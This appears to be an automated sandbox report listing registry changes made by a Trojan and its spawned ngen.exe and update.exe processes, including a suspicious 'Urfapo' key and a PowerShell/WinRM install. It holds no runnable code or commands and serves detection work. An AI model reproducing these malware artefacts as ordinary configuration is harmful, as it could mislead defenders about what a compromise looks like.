The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 A4 9C 3E 6D 8F EF 95 1D E9 A2 29 29 14 CD 31"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 36 3F 03 CA D9 49 27 40 EC 1E 2A 3E ED 88 44"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 06 AE E1 A2 9A 6F 17 80 7E CC A6 C6 71 8C 02"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA BF 7F 74 13 7A 0E 30 EE C9 E7 3C 1F 4B 7E 7B"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 60 25 1D 59 3F 5B A2 71 C0 34 E4 A8 40 77 57"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 91 A1 4B 8E AF C1 5E F3 AF FA 92 92 7F EC 6A"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 00 E6 A9 17 31 9E D1 C0 2B A6 B3 D9 54 7C C9"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 00 5B A4 3B 3B 6C 41 92 DB A0 1E EA 8D 9B 22"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 22 E0 FD 15 DA 56 7A 9F CB 8A 7B 9B F4 FD 91"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 75 E2 45 15 39 DA 4E 54 AA 43 CC 21 47 F4 18"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 03 D2 02 EC DC 5E F3 2A B2 2C BA D5 8E 28 53"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:1724 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 A1 B5 D3 FB 93 58 64 35 9C 44 41 34 0D 19 41"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 87 E0 CA 67 5F 96 A0 E1 59 68 FE 09 42 DB C7"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE FE FD 38 57 45 58 6C 2F E3 28 00 11 68 56 4A"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:2164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 57 E3 32 38 3D DB 9A 85 31 57 BA 83 6E 1D 1F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process ngen.exe:648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C F5 C4 7C 9E A7 9B C2 5B A5 7B 45 F9 0E CC A1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process update.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
